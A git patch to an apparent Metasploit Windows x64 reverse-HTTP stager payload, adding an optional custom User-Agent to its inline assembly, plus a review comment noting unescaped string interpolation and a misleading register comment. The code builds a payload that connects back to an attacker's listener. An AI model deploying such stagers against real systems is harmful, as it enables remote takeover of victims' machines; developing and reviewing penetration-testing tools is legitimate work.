From 8af31e6b01704cd5c687ed6ad7fd27bb5a483815 Mon Sep 17 00:00:00 2001
From: pczinser
Date: Sat, 14 Dec 2024 15:39:16 -0500
Subject: [PATCH] updated the inline asm to use User Agent
---
 .../payload/windows/x64/reverse_http_x64.rb | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)
diff --git a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
index 21e87d26efef..d6ddf74b7cb6 100644
--- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
@@ -62,7 +62,7 @@ def generate(opts={})
 # Otherwise default to small URIs
 conf[:url] = luri + generate_small_uri
 end
-
+
 generate_reverse_http(conf)
 end
 
@@ -168,6 +168,7 @@ def asm_generate_ascii_array(str)
 # @option opts [String] :url The URI to request during staging
 # @option opts [String] :host The host to connect to
 # @option opts [Integer] :port The port to connect to
+ # @option opts [String] :ua The User Agent the payload will use
 # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
 # @option opts [String] :proxy_host The optional proxy server host to use
 # @option opts [Integer] :proxy_port The optional proxy server port to use
@@ -245,9 +246,21 @@ def asm_reverse_http(opts={})
 internetopen:
 push rbx ; stack alignment
 push rbx ; NULL pointer
- mov rcx, rsp ; lpszAgent ("")
 ^
 
+ if opts[:ua]
+ asm << %Q^
+ call load_useragent
+ db"#{opts[:ua]}", 0x00
+ load_useragent:
+ pop rcx ; lpszAgent (stack pointer)
+ ^
+ else
+ asm << %Q^
+ mov rcx, rsp ; lpszAgent("")
+ ^
+ end
+
 if proxy_enabled
 asm << %Q^
 push 3
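Review bot: In the third hunk, `db"#{opts[:ua]}", 0x00` pastes `opts[:ua]` into the assembler source without any escaping, so a user-agent value containing a double quote or a line break would end the string literal early and either fail assembly or be parsed as further directives. Validate the value before building the asm, for example `raise ArgumentError, 'invalid :ua' if opts[:ua].match?(/["\r\n\x00]/)`, or emit it as bytes through the `asm_generate_ascii_array` helper named in the second hunk's header if that helper fits (its body is not visible here). The comment on `pop rcx` is also misleading: rcx receives the address of the inline string that `call` pushed as a return address, not the stack pointer, so `; lpszAgent (address of inline string)` would be accurate. `asm_reverse_http` starts and ends outside the hunk.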